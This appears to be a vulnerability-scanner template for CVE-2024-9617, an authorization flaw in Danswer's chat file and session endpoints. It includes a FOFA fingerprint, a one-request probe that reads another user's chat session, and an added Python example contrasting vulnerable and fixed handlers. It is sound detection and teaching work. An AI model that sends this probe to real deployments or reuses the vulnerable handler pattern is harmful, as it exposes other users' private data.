Vulnerability description
The application does not verify whether the attacker is the creator of the file, allowing the attacker to directly call the GET /api/chat/file/{file_id} interface to view any user's file.
id: CVE-2024-9617

info:
  name: Danswer - Insecure Direct Object Reference
  author: s4e-io
  severity: medium
  description: |
    The application does not verify whether the attacker is the creator of the file, allowing the attacker to directly call the GET /api/chat/file/{file_id} interface to view any user's file.
  impact: |
    Authenticated attackers can access and view files belonging to other users without proper authorization checks through insecure direct object references, leading to unauthorized disclosure of sensitive chat files and data.
  remediation: |
    Update Danswer to a version that implements proper authorization checks to verify file ownership before allowing access through the GET /api/chat/file/{file_id} and GET /api/chat/get-chat-session endpoints.
  reference:
    - https://huntr.com/bounties/8f683ff6-3a99-41c6-b763-a8f7b73bd146
    - https://github.com/danswer-ai/danswer
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2024-9617
    cwe-id: CWE-284
    epss-score: 0.17349
    epss-percentile: 0.94855
  metadata:
    verified: true
    max-request: 1
    vendor: danswer-ai
    product: danswer
    fofa-query: icon_hash="484766002"
  tags: cve,cve2024,danswer,idor,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/chat/get-chat-session/1?is_shared=True"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "chat_session_id", "description", "persona_id")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100d56b782fef5d794abfcabfe78cd19b162308a574365c47476152e46316742bca02200e73e9f5cb1f8acde74853c2ceaf63fb24a4eb2be7c3f52fda9dfac4376c262a:922c64590222798bb761d5b6d8e72950
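The missing ownership check the description talks about, and what the template's probe of GET /api/chat/get-chat-session/1?is_shared=True actually detects, as an added Python example. This is not Danswer's code: the in-memory data model, the handler names, the sample users and files, and the assumption that a caller-supplied is_shared parameter short-circuits the ownership check are all constructed for illustration; the template itself only shows that the request returns a 200 JSON body carrying chat_session_id, description and persona_id. The fixed handlers return the same not-found result for missing and foreign objects so the endpoint cannot be used to enumerate valid ids.

```python
import json
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int


@dataclass(frozen=True)
class ChatFile:
    file_id: str
    owner_id: int
    content: bytes


@dataclass(frozen=True)
class ChatSession:
    id: int
    owner_id: int
    shared: bool          # assumed: server-side "owner marked this public" flag
    description: str
    persona_id: int


class NotFound(Exception):
    pass


# Constructed sample data (not from the advisory): two users, one file and
# one chat session each. Session 2 is the only one its owner chose to share.
ALICE, BOB = User(1), User(2)
FILES = {
    "f1": ChatFile("f1", owner_id=ALICE.id, content=b"alice's upload"),
    "f2": ChatFile("f2", owner_id=BOB.id, content=b"bob's upload"),
}
SESSIONS = {
    1: ChatSession(1, owner_id=ALICE.id, shared=False, description="private", persona_id=0),
    2: ChatSession(2, owner_id=BOB.id, shared=True, description="shared", persona_id=0),
}


def get_file_vulnerable(file_id: str, current_user: User) -> bytes:
    """The flaw: only existence is checked, never who owns the file."""
    f = FILES.get(file_id)
    if f is None:
        raise NotFound(file_id)
    return f.content


def get_file_fixed(file_id: str, current_user: User) -> bytes:
    """Ownership check; missing and foreign files are indistinguishable."""
    f = FILES.get(file_id)
    if f is None or f.owner_id != current_user.id:
        raise NotFound(file_id)
    return f.content


def _session_view(s: ChatSession) -> dict:
    return {"chat_session_id": s.id, "description": s.description, "persona_id": s.persona_id}


def get_session_vulnerable(session_id: int, is_shared: bool, current_user: User) -> dict:
    """Assumed shape of the flaw: the request's is_shared flag decides whether
    the ownership check runs, so ?is_shared=True skips it for any session."""
    s = SESSIONS.get(session_id)
    if s is None:
        raise NotFound(session_id)
    if not is_shared and s.owner_id != current_user.id:
        raise NotFound(session_id)
    return _session_view(s)


def get_session_fixed(session_id: int, is_shared: bool, current_user: User) -> dict:
    """The stored shared flag is authoritative; the query parameter is ignored
    for authorization. Non-owners only see sessions the owner actually shared."""
    s = SESSIONS.get(session_id)
    if s is None or (s.owner_id != current_user.id and not s.shared):
        raise NotFound(session_id)
    return _session_view(s)


def probe(handler, current_user: User):
    """Simulate the template's request against a handler: (status, content_type, body)."""
    try:
        return 200, "application/json", json.dumps(handler(1, True, current_user))
    except NotFound:
        return 404, "application/json", json.dumps({"detail": "not found"})


def template_matches(status_code: int, content_type: str, body: str) -> bool:
    """Same three conditions as the template's DSL matcher, joined with 'and'."""
    return (
        status_code == 200
        and "application/json" in content_type
        and all(key in body for key in ("chat_session_id", "description", "persona_id"))
    )


def denied(handler, *args) -> bool:
    """True if the handler refuses the request with NotFound."""
    try:
        handler(*args)
    except NotFound:
        return True
    return False
```

Running the probe as Bob against session 1 (Alice's private session) hits the vulnerable handler and is rejected by the fixed one, while Alice as the owner still gets her own session from both; that is the only difference the template's matcher is looking for.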